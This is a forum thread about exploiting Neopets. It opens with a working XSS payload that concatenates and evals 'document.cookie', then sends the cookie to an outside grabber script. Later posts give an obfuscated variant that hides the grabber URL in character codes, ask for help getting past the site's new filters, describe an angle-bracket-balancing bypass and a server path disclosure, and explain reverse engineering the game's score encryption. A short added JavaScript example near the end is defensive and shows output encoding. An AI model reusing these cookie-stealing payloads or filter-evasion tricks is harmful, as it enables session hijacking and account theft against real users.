<body onFocus="cs='docu'.concat('men','t.','cook','ie');
cook=eval (cs);
URL='http://xss.awardspace.com/new/cgrab.php?c=';
location.href=URL.concat(escape(cook));">
Assorted Neopets Exploits
Started by kuza55, Dec 06 2005 02:03 PM
20 replies to this topic
#16
Posted 09 February 2006 - 07:17 PM
I wrote this exploit to grab cookies, but now TNT has blocked it. I was wondering if anyone could give me some help coding it more or rewriting it so their system won't block it. Thanks in advance
#17
Posted 11 February 2006 - 07:44 AM
Mmm, I do wonder if these methods still work...
Apage: Does that still work? I'd like to know how the encryption was cracked.
The encryption was just reverse engineered. echeese used an ActionScript decompiler on the Flash file and ported the resulting code to PHP, then we screwed with the functions till we figured out how it actually used them, sniffed a score submission, decoded it, and figured out what it all meant.
I dunno if it still works, I haven't used it in a long time, I haven't played NP in over a year.
If the encryption's been changed I'm sure it's still vulnerable to the same method of decompiling and reversing.
#18
Posted 11 February 2006 - 01:19 PM
Ok, well I spent some time trying to make this work but still nothing. I was wondering if someone could look over this and let me know what is wrong with it. Thanks.
<body C=">" onLoad="test1 = new Array(5) test1[0] = "document.location=String.fr"; test1[1] = "om.CharC"; test1[2] = "ode(39,109,97,108,46,97,119,97,114,100,115,112,97,99,101,46,99,111,109,47,99,103 ,46,112,104,112,63,99,61,39)†doc"; test1[3] = "ument.co"; test1[4] = "okie"; document.write(test1[0],test1[1],test1[2],test1[3],test1[4],test1[5]); >
#19
Posted 12 February 2006 - 12:46 PM
They added some more entry filtering (and maybe some more defences against attacks once you've actually been able to execute Javascript), which seems to check that the number of < and > signs in the input is the same, so something like:
<body C=">" onLoad="alert('hi');">
won't work, but:
<body C=">" onLoad="alert('hi');" X="<" >
will.....
[EDIT]: While trying a few more vectors (some of which worked, but there is no need to post them since the one above works), by some luck I came across this error message:
Fatal error: Unknown function: t me() in /home/neopets/public_html/include/global.functions.inc on line 1450
Which in itself doesn't mean anything, but the file exists, and while it doesn't actually show anything (just returns a blank page, must have configured the server to parse .inc files as .php files as well, or something similar), that's the location of the functions, so yeah, if it helps anyone *shrug*....
Edited by kuza55, 12 February 2006 - 11:13 PM.
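The filter behaviour described in the post above, as an added example that is not part of the original thread: a check that only compares the counts of < and > beside output encoding, run over the two strings quoted in the post. The function names are hypothetical and the balance check is reconstructed from the post's description, not taken from the site's code.

```javascript
// Added example. The balance check below is an assumption reconstructed from
// the forum post's description; it is not the site's actual filter.

// Weak filter: accept input when the number of '<' equals the number of '>'.
function angleBracketsBalanced(input) {
  const opens = (input.match(/</g) || []).length;
  const closes = (input.match(/>/g) || []).length;
  return opens === closes;
}

// Hardened form: encode on output so markup characters render as text and
// the browser never parses user input as a tag or attribute.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(input) {
  return input.replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// The two strings quoted in the post above.
const rejected = `<body C=">" onLoad="alert('hi');">`;
const accepted = `<body C=">" onLoad="alert('hi');" X="<" >`;

// Run both controls over each sample and return the outcome per sample.
function report(samples) {
  return samples.map((s) => ({
    input: s,
    passesBalanceCheck: angleBracketsBalanced(s),
    escaped: escapeHtml(s),
  }));
}

for (const r of report([rejected, accepted])) {
  console.log(r.passesBalanceCheck ? 'accepted' : 'rejected', '|', r.escaped);
}
```

Counting characters says nothing about where the browser will see a tag boundary, which is why the second string passes the check; encoding on output handles both strings the same way.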
#20
Posted 20 February 2006 - 05:18 PM
Guys, it appears as though neopets has entirely disallowed 'onfocus' and some of the other code we've been using.
#21
Posted 20 February 2006 - 06:14 PM
I can't believe it, I honestly find that so amusing that someone would take the time to write an exploit for Neopets. I will admit they were a hit at one time "back in the day when you could sell your accounts for $$$" but now. haha and exploits. It just makes my day.